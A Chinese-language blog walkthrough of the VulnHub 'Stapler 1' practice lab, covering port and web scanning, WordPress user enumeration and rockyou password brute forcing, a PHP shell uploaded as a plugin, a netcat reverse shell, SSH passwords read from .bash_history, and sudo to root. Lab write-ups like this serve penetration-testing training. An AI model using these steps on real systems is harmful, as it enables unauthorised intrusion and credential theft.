靶场练习-vulnhub：STAPLER 1 - VulnHub - 靶场练习 | 🎐清风. = 劈开深海，填入我的山🍂

# 靶场搭建

下载地址： https://download.vulnhub.com/stapler/Stapler.zip

ovf 文件直接导入 VM 会报错，因为它里面的数据结构进行过调整，需要按照 Unicode 字母顺序重新排列，以下是排列好的内容，需要覆盖掉原文件

	<?xml version="1.0" encoding="UTF-8"?>
	<!--Generated by VMware ovftool 4.1.0 (build-3018522), UTC time: 2016-06-07T10:02:55.518806Z-->
	<Envelope vmw:buildId="build-3018522" xmlns="http://schemas.dmtf.org/ovf/envelope/1" xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common" xmlns:ovf="http://schemas.dmtf.org/ovf/envelope/1" xmlns:rasd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData" xmlns:vmw="http://www.vmware.com/schema/ovf" xmlns:vssd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingData" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
	<References>
	<File ovf:href="Stapler-disk1.vmdk" ovf:id="file1" ovf:size="757926912"/>
	</References>
	<DiskSection>
	<Info>Virtual disk information</Info>
	<Disk ovf:capacity="20" ovf:capacityAllocationUnits="byte * 2^30" ovf:diskId="vmdisk1" ovf:fileRef="file1" ovf:format="http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized" ovf:populatedSize="2212560896"/>
	</DiskSection>
	<NetworkSection>
	<Info>The list of logical networks</Info>
	<Network ovf:name="hostonly">
	<Description>The hostonly network</Description>
	</Network>
	</NetworkSection>
	<VirtualSystem ovf:id="vm">
	<Info>A virtual machine</Info>
	<Name>Stapler</Name>
	<OperatingSystemSection ovf:id="93" vmw:osType="ubuntuGuest">
	<Info>The kind of installed guest operating system</Info>
	</OperatingSystemSection>
	<VirtualHardwareSection>
	<Info>Virtual hardware requirements</Info>
	<System>
	<vssd:Caption>Virtual Hardware Family</vssd:Caption>
	<vssd:InstanceID>0</vssd:InstanceID>
	<vssd:VirtualSystemIdentifier>Stapler</vssd:VirtualSystemIdentifier>
	<vssd:VirtualSystemType>vmx-15</vssd:VirtualSystemType>
	</System>
	<Item>
	<rasd:AllocationUnits>hertz * 10^6</rasd:AllocationUnits>
	<rasd:Caption>1 virtual CPU(s)</rasd:Caption>
	<rasd:Description>Number of Virtual CPUs</rasd:Description>
	<rasd:InstanceID>1</rasd:InstanceID>
	<rasd:ResourceType>3</rasd:ResourceType>
	<rasd:VirtualQuantity>1</rasd:VirtualQuantity>
	</Item>
	<Item>
	<rasd:AllocationUnits>byte * 2^20</rasd:AllocationUnits>
	<rasd:Caption>1024MB of memory</rasd:Caption>
	<rasd:Description>Memory Size</rasd:Description>
	<rasd:InstanceID>2</rasd:InstanceID>
	<rasd:ResourceType>4</rasd:ResourceType>
	<rasd:VirtualQuantity>1024</rasd:VirtualQuantity>
	</Item>
	<Item>
	<rasd:Address>0</rasd:Address>
	<rasd:Caption>sataController0</rasd:Caption>
	<rasd:Description>SATA Controller</rasd:Description>
	<rasd:InstanceID>3</rasd:InstanceID>
	<rasd:ResourceSubType>AHCI</rasd:ResourceSubType>
	<rasd:ResourceType>20</rasd:ResourceType>
	</Item>
	<Item ovf:required="false">
	<rasd:Address>0</rasd:Address>
	<rasd:Caption>usb</rasd:Caption>
	<rasd:Description>USB Controller (EHCI)</rasd:Description>
	<rasd:InstanceID>4</rasd:InstanceID>
	<rasd:ResourceSubType>vmware.usb.ehci</rasd:ResourceSubType>
	<rasd:ResourceType>23</rasd:ResourceType>
	<vmw:Config ovf:required="false" vmw:key="ehciEnabled" vmw:value="true"/>
	</Item>
	<Item>
	<rasd:Address>0</rasd:Address>
	<rasd:Caption>scsiController0</rasd:Caption>
	<rasd:Description>SCSI Controller</rasd:Description>
	<rasd:InstanceID>5</rasd:InstanceID>
	<rasd:ResourceSubType>lsilogic</rasd:ResourceSubType>
	<rasd:ResourceType>6</rasd:ResourceType>
	</Item>
	<Item>
	<rasd:AddressOnParent>2</rasd:AddressOnParent>
	<rasd:AutomaticAllocation>true</rasd:AutomaticAllocation>
	<rasd:Caption>ethernet0</rasd:Caption>
	<rasd:Connection>hostonly</rasd:Connection>
	<rasd:Description>PCNet32 ethernet adapter on "hostonly"</rasd:Description>
	<rasd:InstanceID>6</rasd:InstanceID>
	<rasd:ResourceSubType>PCNet32</rasd:ResourceSubType>
	<rasd:ResourceType>10</rasd:ResourceType>
	<vmw:Config ovf:required="false" vmw:key="slotInfo.pciSlotNumber" vmw:value="33"/>
	<vmw:Config ovf:required="false" vmw:key="wakeOnLanEnabled" vmw:value="false"/>
	</Item>
	<Item ovf:required="false">
	<rasd:AutomaticAllocation>false</rasd:AutomaticAllocation>
	<rasd:Caption>video</rasd:Caption>
	<rasd:InstanceID>7</rasd:InstanceID>
	<rasd:ResourceType>24</rasd:ResourceType>
	<vmw:Config ovf:required="false" vmw:key="enable3DSupport" vmw:value="false"/>
	<vmw:Config ovf:required="false" vmw:key="slotInfo.pciSlotNumber" vmw:value="33"/>
	</Item>
	<Item ovf:required="false">
	<rasd:AutomaticAllocation>false</rasd:AutomaticAllocation>
	<rasd:Caption>vmci</rasd:Caption>
	<rasd:InstanceID>8</rasd:InstanceID>
	<rasd:ResourceSubType>vmware.vmci</rasd:ResourceSubType>
	<rasd:ResourceType>1</rasd:ResourceType>
	<vmw:Config ovf:required="false" vmw:key="slotInfo.pciSlotNumber" vmw:value="33"/>
	</Item>
	<Item>
	<rasd:AddressOnParent>0</rasd:AddressOnParent>
	<rasd:Caption>disk0</rasd:Caption>
	<rasd:HostResource>ovf:/disk/vmdisk1</rasd:HostResource>
	<rasd:InstanceID>9</rasd:InstanceID>
	<rasd:Parent>3</rasd:Parent>
	<rasd:ResourceType>17</rasd:ResourceType>
	<vmw:Config ovf:required="false" vmw:key="slotInfo.pciSlotNumber" vmw:value="33"/>
	</Item>
	<Item ovf:required="false">
	<rasd:AddressOnParent>1</rasd:AddressOnParent>
	<rasd:AutomaticAllocation>false</rasd:AutomaticAllocation>
	<rasd:Caption>cdrom0</rasd:Caption>
	<rasd:InstanceID>10</rasd:InstanceID>
	<rasd:Parent>3</rasd:Parent>
	<rasd:ResourceType>15</rasd:ResourceType>
	<vmw:Config ovf:required="false" vmw:key="slotInfo.pciSlotNumber" vmw:value="33"/>
	</Item>
	<vmw:Config ovf:required="false" vmw:key="cpuHotAddEnabled" vmw:value="true"/>
	<vmw:Config ovf:required="false" vmw:key="memoryHotAddEnabled" vmw:value="true"/>
	<vmw:Config ovf:required="false" vmw:key="powerOpInfo.powerOffType" vmw:value="soft"/>
	<vmw:Config ovf:required="false" vmw:key="powerOpInfo.resetType" vmw:value="soft"/>
	<vmw:Config ovf:required="false" vmw:key="powerOpInfo.suspendType" vmw:value="soft"/>
	<vmw:Config ovf:required="false" vmw:key="tools.afterPowerOn" vmw:value="true"/>
	<vmw:Config ovf:required="false" vmw:key="tools.afterResume" vmw:value="true"/>
	<vmw:Config ovf:required="false" vmw:key="tools.beforeGuestShutdown" vmw:value="true"/>
	<vmw:Config ovf:required="false" vmw:key="tools.beforeGuestStandby" vmw:value="true"/>
	<vmw:Config ovf:required="false" vmw:key="tools.syncTimeWithHost" vmw:value="true"/>
	<vmw:Config ovf:required="false" vmw:key="tools.toolsUpgradePolicy" vmw:value="upgradeAtPowerCycle"/>
	</VirtualHardwareSection>
	<AnnotationSection ovf:required="false">
	<Info>A human-readable annotation</Info>
	<Annotation>--[[~~Enjoy. Have fun. Happy Hacking.~~]]--

	+ There are multiple methods to-do this machine: At least
	-- Two (2) paths to get a limited shell
	-- At least three (3) ways to get a root access</Annotation>
	</AnnotationSection>
	</VirtualSystem>
	</Envelope>

覆盖掉原文件后需要修改 mf 文件中记录的散列值: SHA1(Stapler.ovf)= 0737f41d2e522cda052c876ccb1fba6235dbacc5 这样就可以

通过虚拟机打开功能打开 ovf 文件就可以了

老规矩，添加一张网卡，设置 NAT 模式，IP 地址： 192.168.74.139

# 信息收集

# nmap

做一个快速地全端口扫描

	┌──(root㉿kali)-[~]
	└─# nmap 192.168.74.139 -p- -T5
	Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 09:30 EDT
	Nmap scan report for 192.168.74.139
	Host is up (0.00032s latency).
	Not shown: 65523 filtered tcp ports (no-response)
	PORT STATE SERVICE
	20/tcp closed ftp-data
	21/tcp open ftp
	22/tcp open ssh
	53/tcp open domain
	80/tcp open http
	123/tcp closed ntp
	137/tcp closed netbios-ns
	138/tcp closed netbios-dgm
	139/tcp open netbios-ssn
	666/tcp open doom
	3306/tcp open mysql
	12380/tcp open unknown
	MAC Address: 00:0C:29:24:85:D3 (VMware)

	Nmap done: 1 IP address (1 host up) scanned in 54.69 seconds

快速扫描没扫出来 12380 是什么东西，仔细扫扫看

	┌──(root㉿kali)-[~]
	└─# nmap 192.168.74.139 -sV -p 12380
	Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 09:36 EDT
	Nmap scan report for 192.168.74.139
	Host is up (0.00038s latency).

	PORT STATE SERVICE VERSION
	12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
	MAC Address: 00:0C:29:24:85:D3 (VMware)

	Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
	Nmap done: 1 IP address (1 host up) scanned in 11.66 seconds

发现原来也是个 web

扫描一下漏洞：

nmap 192.168.74.139 --script=vuln

发现存在 smb-vuln-cve2009-3103 ，但是 OS 不是 Windows。无

# dirsearch

	┌──(root㉿kali)-[~]
	└─# dirsearch -u http://192.168.74.139
	/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
	from pkg_resources import DistributionNotFound, VersionConflict

	_\|. _ _ _ _ _ _\|_ v0.4.3
	(_\|\|\| _) (/_(_\|\| (_\| )

	Extensions: php, aspx, jsp, html, js \| HTTP method: GET \| Threads: 25 \| Wordlist size: 11460

	Output File: /root/reports/http_192.168.74.139/_24-04-08_09-32-20.txt

	Target: http://192.168.74.139/

	[09:32:20] Starting:
	[09:32:21] 200 - 220B - /.bash_logout
	[09:32:21] 200 - 4KB - /.bashrc
	[09:32:26] 200 - 675B - /.profile

	Task Completed

三个 shell 配置文件，不知道这个靶场葫芦里卖的什么药

# nikto

	┌──(root㉿kali)-[~]
	└─# nikto -h 192.168.74.139:12380
	- Nikto v2.5.0
	---------------------------------------------------------------------------
	+ Target IP: 192.168.74.139
	+ Target Hostname: 192.168.74.139
	+ Target Port: 12380
	+ Start Time: 2024-04-08 09:38:58 (GMT-4)
	---------------------------------------------------------------------------
	+ Server: Apache/2.4.18 (Ubuntu)
	+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
	+ /: Uncommon header 'dave' found, with contents: Soemthing doesn't look right here.
	+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
	+ No CGI Directories found (use '-C all' to force check all possible dirs)
	+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
	+ /c/: This might be interesting.
	+ /js: This might be interesting.
	+ /CSNews.cgi?command=viewnews&database=none: csNews reveals system path and other sensitive information in error messages. Also may be possible to bypass authentication mechanism.
	+ /ci/: This might be interesting: potential country code (CÔte D'ivoire).
	+ /is/: This might be interesting: potential country code (Iceland).
	+ /ie/: This might be interesting: potential country code (Ireland).
	+ /nu/: This might be interesting: potential country code (Niue).
	+ /sb/: This might be interesting: potential country code (Solomon Islands).
	+ /gs/: This might be interesting: potential country code (South Georgia And The South Sandwich Islands).
	+ /wcadmin/login.aspx: QS/1 Webconnect administration panel.
	+ 8115 requests: 14 error(s) and 14 item(s) reported on remote host
	+ End Time: 2024-04-08 09:52:01 (GMT-4) (783 seconds)
	---------------------------------------------------------------------------
	+ 1 host(s) tested

没有任何东西，奇了怪了，也看了看 web，就是啥也没发现

# 再次信息收集

怎么也收集不到关键信息，甚至找不到入口在哪里。所以再次信息收集，怀疑是 SSL 协议，所以重新收集一下信息

# dirsearch

	┌──(root㉿kali)-[~]
	└─# dirsearch -u https://192.168.74.139:12380
	/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
	from pkg_resources import DistributionNotFound, VersionConflict

	_\|. _ _ _ _ _ _\|_ v0.4.3
	(_\|\|\| _) (/_(_\|\| (_\| )

	Extensions: php, aspx, jsp, html, js \| HTTP method: GET \| Threads: 25 \| Wordlist size: 11460

	Output File: /root/reports/https_192.168.74.139_12380/_24-04-08_10-05-28.txt

	Target: https://192.168.74.139:12380/

	[10:05:28] Starting:
	[10:05:35] 403 - 303B - /.ht_wsr.txt
	[10:05:35] 403 - 306B - /.htaccess.bak1
	[10:05:35] 403 - 306B - /.htaccess_orig
	[10:05:35] 403 - 304B - /.htaccessBAK
	[10:05:35] 403 - 308B - /.htaccess.sample
	[10:05:35] 403 - 306B - /.htaccess.orig
	[10:05:35] 403 - 305B - /.htaccessOLD2
	[10:05:35] 403 - 296B - /.htm
	[10:05:35] 403 - 304B - /.htaccess_sc
	[10:05:35] 403 - 307B - /.htaccess_extra
	[10:05:35] 403 - 306B - /.htaccess.save
	[10:05:35] 403 - 297B - /.html
	[10:05:35] 403 - 302B - /.htpasswds
	[10:05:35] 403 - 306B - /.htpasswd_test
	[10:05:35] 403 - 304B - /.htaccessOLD
	[10:05:35] 403 - 303B - /.httr-oauth
	[10:05:37] 403 - 296B - /.php
	[10:05:37] 403 - 297B - /.php3
	[10:06:27] 301 - 331B - /javascript -> https://192.168.74.139:12380/javascript/
	[10:06:43] 301 - 331B - /phpmyadmin -> https://192.168.74.139:12380/phpmyadmin/
	[10:06:45] 200 - 3KB - /phpmyadmin/doc/html/index.html
	[10:06:45] 200 - 3KB - /phpmyadmin/
	[10:06:45] 200 - 3KB - /phpmyadmin/index.php
	[10:06:53] 200 - 59B - /robots.txt
	[10:06:56] 403 - 305B - /server-status
	[10:06:56] 403 - 306B - /server-status/

	Task Completed

# nikto

	┌──(root㉿kali)-[~]
	└─# nikto -h https://192.168.74.139:12380/
	- Nikto v2.5.0
	---------------------------------------------------------------------------
	+ Target IP: 192.168.74.139
	+ Target Hostname: 192.168.74.139
	+ Target Port: 12380
	---------------------------------------------------------------------------
	+ SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=[email protected]
	Ciphers: ECDHE-RSA-AES256-GCM-SHA384
	Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=[email protected]
	+ Start Time: 2024-04-08 10:05:43 (GMT-4)
	---------------------------------------------------------------------------
	+ Server: Apache/2.4.18 (Ubuntu)
	+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
	+ /: Uncommon header 'dave' found, with contents: Soemthing doesn't look right here.
	+ /: The site uses TLS and the Strict-Transport-Security HTTP header is not defined. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Strict-Transport-Security
	+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
	+ No CGI Directories found (use '-C all' to force check all possible dirs)
	+ /robots.txt: Entry '/admin112233/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
	+ RFC-1918 /blogblog/: IP address found in the 'x-pingback' header. The IP is "192.168.164.128". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
	+ /robots.txt: Entry '/blogblog/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
	+ /robots.txt: contains 2 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
	+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
	+ Hostname '192.168.74.139' does not match certificate's names: Red.Initech. See: https://cwe.mitre.org/data/definitions/297.html
	+ OPTIONS: Allowed HTTP Methods: OPTIONS, GET, HEAD, POST .
	+ /phpmyadmin/changelog.php: Uncommon header 'x-ob_mode' found, with contents: 1.
	+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
	+ /phpmyadmin/: phpMyAdmin directory found.
	+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
	+ 8259 requests: 1 error(s) and 15 item(s) reported on remote host
	+ End Time: 2024-04-08 10:13:34 (GMT-4) (471 seconds)
	---------------------------------------------------------------------------
	+ 1 host(s) tested

这次就发现东西了

查看一下 blogblog 路径和 admin112233

发现是 wordpress 和一个 XSS 钓鱼的页面

那就懂了，这个靶场是要干碎 wordpress 和使用 Beef 钓鱼

# 汇总

admin112233 路径
blogblog 路径
phpmyadmin
wordpress4.2.1
Apache/2.4.18
Ubuntu
wpscan
BEEF XSS 钓鱼
SSH 爆破
FTP 爆破
phpmyadmin

# 漏洞利用

# wpscan

用 wpscan 扫一下先，直接扫描会报错 seems to be down (SSL peer certificate or SSH remote key was not OK)

所以我们扫描的时候禁用 tls 检查

	┌──(root㉿kali)-[~]
	└─# wpscan --url https://192.168.74.139:12380/blogblog/ --disable-tls-checks

没有发现插件、主题等，那么攻击面就比较窄了，使用 api-token 看一下漏洞数量

	┌──(root㉿kali)-[~]
	└─# wpscan --url https://192.168.74.139:12380/blogblog/--disable-tls-checks --api-token 我的 KEY

牛逼 118 个洞，有文件上柴暖、sql 注入。具体就能能不能用我有点懒得试

尝试枚举用户名

	┌──(root㉿kali)-[~]
	└─# wpscan --url https://192.168.74.139:12380/blogblog/ --disable-tls-checks -e u

	[+] john
	\| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
	\| Confirmed By: Login Error Messages (Aggressive Detection)

	[+] garry
	\| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
	\| Confirmed By: Login Error Messages (Aggressive Detection)

	[+] peter
	\| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
	\| Confirmed By: Login Error Messages (Aggressive Detection)

	[+] elly
	\| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
	\| Confirmed By: Login Error Messages (Aggressive Detection)

	[+] kathy
	\| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
	\| Confirmed By: Login Error Messages (Aggressive Detection)

	[+] harry
	\| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
	\| Confirmed By: Login Error Messages (Aggressive Detection)

	[+] scott
	\| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
	\| Confirmed By: Login Error Messages (Aggressive Detection)

	[+] heather
	\| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
	\| Confirmed By: Login Error Messages (Aggressive Detection)

	[+] barry
	\| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
	\| Confirmed By: Login Error Messages (Aggressive Detection)

	[+] tim
	\| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
	\| Confirmed By: Login Error Messages (Aggressive Detection)

发现了一些用户名，可以尝试进行撞库，但是撞库我认为是底牌，在此之前先尝试其他的用法

其实扫出来 118 个漏洞都可以尝试使用，但是真不想一个个试了，需要再次收集一下信息

# 爆破

通过之前的信息收集能找到 wp 的上传文件夹，但是上传文件夹中有上传的插件，通过插件的名字查到漏洞信息，可以通过具体的漏洞信息进行 getshell。但是很麻烦所以直接爆破 wp 账号的口令算了

解压常用的字典文件： gzip -d /usr/share/wordlists/rockyou.txt.gz

然后进行爆破

┌──(root㉿kali)-[~/Desktop]

└─# wpscan --url https://192.168.74.139:12380/blogblog -P /usr/share/wordlists/rockyou.txt -U john --disable-tls-checks --max-threads 100 --password-attack wp-login

爆破了 18 万次，这也是为什么不推荐的原因，实在是太久了。得到了账号密码： john/incorrect

登录进去之后发现是管理员权限

那就直接通过插件上传马子，或者直接修改模板写入一句话

通过插件上传 kali 自带的 shell.php

nc 监听拿到了反弹 shell

	┌──(root㉿kali)-[~]
	└─# nc -lvp 1234
	listening on [any] 1234 ...
	Warning: forward host lookup failed for bogon: Unknown host
	connect to [192.168.74.129] from bogon [192.168.74.139] 57954
	Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 athlon i686 GNU/Linux
	14:49:29 up 2:17, 0 users, load average: 84.46, 78.24, 48.52
	USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
	uid=33(www-data) gid=33(www-data) groups=33(www-data)
	/bin/sh: 0: can't access tty; job control turned off
	$

查看一下所有用户的历史记录 cat /home/*/.bash_history

看到了两个账号密码

	sshpass -p thisimypassword ssh JKanode@localhost
	apt-get install sshpass
	sshpass -p JZQuyIN5 peter@localhost

还有一条记录表明 peter 账号我们没有权限查看他的历史记录，所以估计是个高权限账号，我们就登录到这个账号里面去

进去之后查看 sudo 权限，直接切换 root 账号就可以

	www-data@red:/home$ ssh peter@localhost
	ssh peter@localhost
	Could not create directory '/var/www/.ssh'.
	The authenticity of host 'localhost (127.0.0.1)' can't be established.
	ECDSA key fingerprint is SHA256:WuY26BwbaoIOawwEIZRaZGve4JZFaRo7iSvLNoCwyfA.
	Are you sure you want to continue connecting (yes/no)? yes
	yes
	Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
	-----------------------------------------------------------------
	~ Barry, don't forget to put a message here ~
	-----------------------------------------------------------------
	peter@localhost's password: JZQuyIN5

	Welcome back!


	This is the Z Shell configuration function for new users,
	zsh-newuser-install.
	You are seeing this message because you have no zsh startup files
	(the files .zshenv, .zprofile, .zshrc, .zlogin in the directory
	~). This function can help you with a few settings that should
	make your use of the shell easier.

	You can:

	(q) Quit and do nothing. The function will be run again next time.

	(0) Exit, creating the file ~/.zshrc containing just a comment.
	That will prevent this function being run again.

	(1) Continue to the main menu.

	(2) Populate your ~/.zshrc with the configuration recommended
	by the system administrator and exit (you will need to edit
	the file by hand, if so desired).

	--- Type one of the keys in parentheses --- 2
	2^J
	prompt_adam1_setup:1: scalar parameter prompt_adam1_color1 created globally in function
	prompt_adam1_setup:2: scalar parameter prompt_adam1_color2 created globally in function
	prompt_adam1_setup:3: scalar parameter prompt_adam1_color3 created globally in function
	prompt_adam1_setup:5: scalar parameter base_prompt created globally in function
	prompt_adam1_setup:6: scalar parameter post_prompt created globally in function
	prompt_adam1_setup:9: scalar parameter base_prompt_no_color created globally in function
	prompt_adam1_setup:10: scalar parameter post_prompt_no_color created globally in function
	/home/peter/.zshrc:15: scalar parameter HISTFILE created globally in function
	(eval):1: scalar parameter LS_COLORS created globally in function
	peter@red ~ %
	peter@red ~ % sudo -l
	sudo -l

	We trust you have received the usual lecture from the local System
	Administrator. It usually boils down to these three things:

	#1) Respect the privacy of others.
	#2) Think before you type.
	#3) With great power comes great responsibility.

	[sudo] password for peter: JZQuyIN5

	Matching Defaults entries for peter on red:
	lecture=always, env_reset, mail_badpass,
	secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

	User peter may run the following commands on red:
	(ALL : ALL) ALL
	peter@red ~ % sudo su root
	sudo su root
	➜ peter id
	id
	uid=0(root) gid=0(root) groups=0(root)

最终拿到了 root 权限

这个配置是关于用户 peter 在主机 red 上的 sudo 权限配置。让我们来逐条解释这些配置项：
Defaults entries for peter on red:
lecture=always : 这个选项指定了当用户 peter 使用 sudo 时，系统应该始终显示授权信息和警告信息。
env_reset : 这个选项指定了在运行 sudo 命令时，环境变量应该被重置为安全的默认值，以避免潜在的安全问题。
mail_badpass : 这个选项指定了如果用户输入了错误的密码尝试使用 sudo，系统应该通过邮件通知管理员。
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin : 这个选项指定了在使用 sudo 时，用户 peter 能够访问的命令路径。这里列出的路径是安全的系统默认路径，用户可以在这些路径中执行命令。
User peter may run the following commands on red:
(ALL : ALL) ALL : 这个条目指定了用户 peter 在主机 red 上拥有完全的 sudo 权限。具体来说，它表示 peter 可以以任何用户身份（ALL）、在任何终端（ALL）、运行任何命令（ALL）。
总结起来，这个配置允许用户 peter 在主机 red 上使用 sudo 以任何用户身份运行任何命令，系统会始终显示授权信息和警告信息，环境变量会被重置为安全默认值，而且如果密码输入错误会通过邮件通知管理员。这样的配置是非常强大的，因此应该谨慎使用，确保只有经过授权的用户才能拥有这样的权限。

# 小结

思路很混乱，信息收集不是一个一次性的过程，而是多次循环的，太局限与初始的信息收集了，之后不再进行汇总式信息收集，而是随着深入进行收集，将汇总的信息单独放在最后

同时太懒，不愿意去看别人写的代码，并且不愿意去做尝试，这源于我对工具本省不熟练，没有组成属于自己习惯的攻击方式。导致遇到新的点就需要不停地切换不同的工具，进而产生怠惰

但是这种都需要一点点磨炼，一定要多动手才可以越来越轻松。

共勉，加油！

靶场 VulnHub

# 靶场搭建

# 信息收集

# nmap

# dirsearch

# nikto

# 再次信息收集

# dirsearch

# nikto

# 汇总

# 漏洞利用

# wpscan

# 爆破

# 小结

靶场练习-vulnhub：Sedna

靶场练习-vulnhub：Pinkys-Place2